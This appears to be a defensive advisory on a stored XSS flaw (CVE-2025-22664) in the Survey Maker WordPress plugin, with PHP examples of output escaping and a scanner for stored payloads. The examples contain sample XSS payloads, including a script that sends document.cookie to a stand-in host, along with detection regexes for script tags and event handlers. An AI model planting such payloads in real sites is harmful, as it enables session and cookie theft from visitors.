
CVE-2025-22664: Medium Vulnerability in Ays Pro Survey Maker

CVE-2025-22664 is a medium-severity stored Cross-site Scripting (XSS) vulnerability in the Ays Pro Survey Maker WordPress plugin, affecting versions through 5.1.3.5. Organizations running the plugin should update to a fixed release and review stored survey content for injected markup.

MEDIUM · CVSS 5.9 · Published February 4, 2025


CVE-2025-22664 is a medium-severity Cross-site Scripting (XSS) vulnerability, classified as CWE-79 (improper neutralization of input during web page generation), in the Ays Pro Survey Maker WordPress plugin. Input supplied through the plugin is written into generated pages without adequate neutralization, so an attacker holding a sufficiently privileged account can store a script payload that later executes in the browser of anyone who views the affected page. All versions up to and including 5.1.3.5 are affected. Organizations running the plugin should update without delay.

The CVSS 3.1 base score is 5.9 (medium), consistent with the vector AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L: the attack is network-reachable and low in complexity, but it requires high privileges on the target site and user interaction (a victim must load the page carrying the payload); the scope change reflects that the script runs in victims' browsers rather than on the server that stored it. Confidentiality, integrity and availability impacts are each rated low. The privilege requirement narrows the attacker population, but once a payload is in place the confidentiality and integrity of every viewer's session with the site are at stake.

For an affected site the risk is the standard stored-XSS one: script running in the context of a viewing user's session can read page content, perform actions that user is authorized to perform and alter what visitors see. Given the medium rating and the fact that survey pages are shown to authenticated and anonymous visitors alike, patching should be scheduled promptly rather than left for an indefinite cycle.

At the time of writing there is no known public exploit or proof of concept. Exploitation requires a high-privilege account and a victim who views the stored content, which limits opportunistic attacks, but stored XSS is straightforward to weaponize once the injection point is known, so the absence of a public PoC should not be read as the absence of risk.

Vulnerability Details

The flaw is an improper neutralization of input during web page generation (CWE-79) resulting in stored XSS. It affects the Ays Pro Survey Maker plugin in all versions through 5.1.3.5; the advisory gives no lower version bound (listed as "n/a"). The CVSS 3.1 base score is 5.9, medium.

Technical Analysis

The root cause is that user-controlled input handled by the Survey Maker plugin is rendered into HTML without context-appropriate escaping or sanitization. The attack vector is network-based: the payload is submitted through the plugin's web interface and stored. Attack complexity is low, but the privileges-required metric is high, meaning the attacker must already hold a highly privileged account on the WordPress site (for a plugin of this kind, typically an administrator-level account able to use its authoring features). User interaction is required because the payload executes only when a victim loads the page that renders the stored content.

The rated impact is low for confidentiality, integrity and availability individually, which is usual for XSS: the script is confined to the victim's browser session, but within that session it can read data and act as the victim. The practical lesson is that any feature generating pages from stored user content needs output escaping and ongoing review of what has been stored.

Risk & Impact Analysis

The real-world risk is moderate. It matters most to organizations that use Survey Maker for customer-facing engagement or data collection, where a planted script could tamper with surveys, redirect respondents or act within a viewer's session. Because the attacker must already hold a privileged account, the flaw is more likely to be used to extend the reach of a compromised or malicious privileged user than as an initial entry point. With a CVSS score of 5.9, address it in the next scheduled patch window at the latest.

Medium severity does not justify deferring the fix indefinitely: the remediation is a routine plugin upgrade, so apply it as soon as change control allows, and sooner if the site has many privileged accounts or if privileged credentials are suspected to have been exposed.

Exploitation Status

Signal               Status
Known Exploit        No
Public PoC           No
Actively Exploited   No
Ransomware Use       No

Affected Versions

The vulnerability affects Survey Maker through version 5.1.3.5, i.e. every release prior to 5.1.3.6. Confirm the installed version on the WordPress plugins screen or with WP-CLI (`wp plugin list`) and move to 5.1.3.6 or later.

Mitigation & Remediation

Update Ays Pro Survey Maker to 5.1.3.6 or later. If the update cannot be applied immediately: since exploitation needs a high-privilege account, audit who holds such accounts, remove those that are not needed and enforce strong authentication on the rest; restrict the plugin's survey-authoring features to the smallest set of users; and, as a stopgap rather than a fix, consider a web application firewall rule set that blocks common XSS payloads. Where you maintain custom templates or integrations that echo survey content, apply context-aware output encoding (escape on output, sanitize on save). Payloads stored before the upgrade are still in the database; review existing survey content after patching rather than assuming the upgrade cleaned it.
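The escaping pattern behind the "output encoding" advice, as an added illustration that is not the Survey Maker plugin's code and assumes nothing about its internals: a hypothetical survey-title renderer shown the vulnerable way and the hardened way. `esc_html()` and `esc_attr()` are WordPress core functions; the stand-ins defined below exist only so the file runs under plain PHP outside WordPress.

```php
<?php
// Added illustration (not the Survey Maker plugin's code): a hypothetical
// survey-title renderer written the vulnerable way and the hardened way.
// A stored XSS of the CVE-2025-22664 kind exists whenever a value saved by a
// privileged user is echoed into HTML without context-aware escaping.
//
// Inside WordPress, esc_html()/esc_attr() come from core. The stand-ins
// below (plain htmlspecialchars) exist only so the file runs with `php`
// outside WordPress; they are not a replacement for the core functions.

if (!function_exists('esc_html')) {
    function esc_html(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

/** VULNERABLE: stored title interpolated verbatim into attribute and text contexts. */
function render_survey_header_vulnerable(array $survey): string {
    return '<h2 class="survey-title" title="' . $survey['title'] . '">'
         . $survey['title'] . '</h2>';
}

/** HARDENED: escape for the exact context (attribute vs. text) at the point of output. */
function render_survey_header_hardened(array $survey): string {
    return '<h2 class="survey-title" title="' . esc_attr($survey['title']) . '">'
         . esc_html($survey['title']) . '</h2>';
}

// Constructed sample record: a title an attacker with survey-editing rights might store.
// The leading quote closes the title attribute so the <img> lands in tag context.
$survey = ['title' => 'Feedback"><img src=x onerror=alert(document.domain)>'];

echo "vulnerable: " . render_survey_header_vulnerable($survey) . PHP_EOL;
echo "hardened:   " . render_survey_header_hardened($survey) . PHP_EOL;
```

Escaping on output is the primary control because stored rows can arrive through several paths (imports, older data, other plugins) and the renderer is the one place every path converges; sanitizing on save with `wp_kses_post()` for users without the `unfiltered_html` capability is a useful second layer, not a substitute. Note also that the two contexts need their own escaping: a value safe as text is not automatically safe inside an attribute.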

Detection Guidance

Because the payload is stored by an authenticated privileged user, the most reliable detection is to review the stored survey content itself (titles, questions, answer options and messages) for script tags, event-handler attributes such as onerror= or onload=, javascript: URLs and encoded variants of these. In web server and WordPress activity logs, look for survey-authoring requests from privileged accounts at unusual times or from unusual addresses, and for edits to surveys by accounts that do not normally manage them. A web application firewall can flag or block common XSS payloads in submissions, but treat it as supplementary: encoding tricks and payloads entered through trusted admin sessions can slip past signature rules.
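A read-only scan of exported survey text for the indicators listed above, added here as an example and not taken from the advisory or the plugin. The column names (`title`, `question`, `answer`) and the sample rows are constructed; point the loop at a real export of the plugin's survey tables to use it. It decodes URL and HTML-entity encoding before matching, because naive grepping for `<script` misses the encoded forms an attacker is likely to store.

```php
<?php
// Added example, not part of the original advisory or the plugin: a
// read-only scan of already-stored survey text for markup that a stored XSS
// payload needs. Column names and the rows at the bottom are constructed.

/** Undo the common encodings used to slip past naive grep; repeat for double-encoding. */
function normalise(string $s): string {
    $prev = null;
    for ($i = 0; $i < 3 && $s !== $prev; $i++) {
        $prev = $s;
        $s = rawurldecode($s);
        $s = html_entity_decode($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
    // Drop control characters that can split tokens, then case-fold.
    $s = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F]/', '', $s);
    return strtolower($s);
}

/** Indicator patterns; each key names the technique the pattern corresponds to. */
const XSS_INDICATORS = [
    'script tag'            => '/<\s*script\b/',
    'event handler attr'    => '/\bon[a-z]+\s*=/',
    'javascript: URL'       => '/javascript\s*:/',
    'embedded frame/object' => '/<\s*(iframe|object|embed)\b/',
    'svg/math vector'       => '/<\s*(svg|math)\b/',
    'srcdoc attribute'      => '/\bsrcdoc\s*=/',
];

/** Return one hit per (row id, field, indicator) for rows whose text matches. */
function scan_rows(array $rows): array {
    $hits = [];
    foreach ($rows as $row) {
        foreach (['title', 'question', 'answer'] as $field) {
            if (!isset($row[$field])) {
                continue;
            }
            $text = normalise($row[$field]);
            foreach (XSS_INDICATORS as $name => $re) {
                if (preg_match($re, $text)) {
                    $hits[] = ['id' => $row['id'], 'field' => $field, 'indicator' => $name];
                }
            }
        }
    }
    return $hits;
}

// Constructed sample rows. Row 3 is double-URL-encoded; row 4 uses HTML entities.
$rows = [
    ['id' => 1, 'title' => 'Customer satisfaction Q3', 'question' => 'How likely are you to recommend us?'],
    ['id' => 2, 'title' => 'Promo <script>fetch("//evil.example/"+document.cookie)</script>'],
    ['id' => 3, 'question' => 'Rate us %253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E'],
    ['id' => 4, 'answer' => '&lt;svg onload=alert(1)&gt;'],
    ['id' => 5, 'answer' => 'Great support, thanks!'],
];

foreach (scan_rows($rows) as $hit) {
    printf("row %d field=%s indicator=%s\n", $hit['id'], $hit['field'], $hit['indicator']);
}
```

Rows 2, 3 and 4 are reported; rows 1 and 5 are not. Treat hits as leads rather than verdicts: the event-handler pattern will also match innocent text such as "one = 1", so review each flagged row, and tie any confirmed payload back to the account and time that last edited it in the site's activity log.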

AppSecure Threat Intelligence Insight

CVE-2025-22664 highlights the ongoing need for vigilance against XSS vulnerabilities, particularly in user-generated content scenarios. Organizations should continuously assess their web applications for potential risks and implement robust security measures.


Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
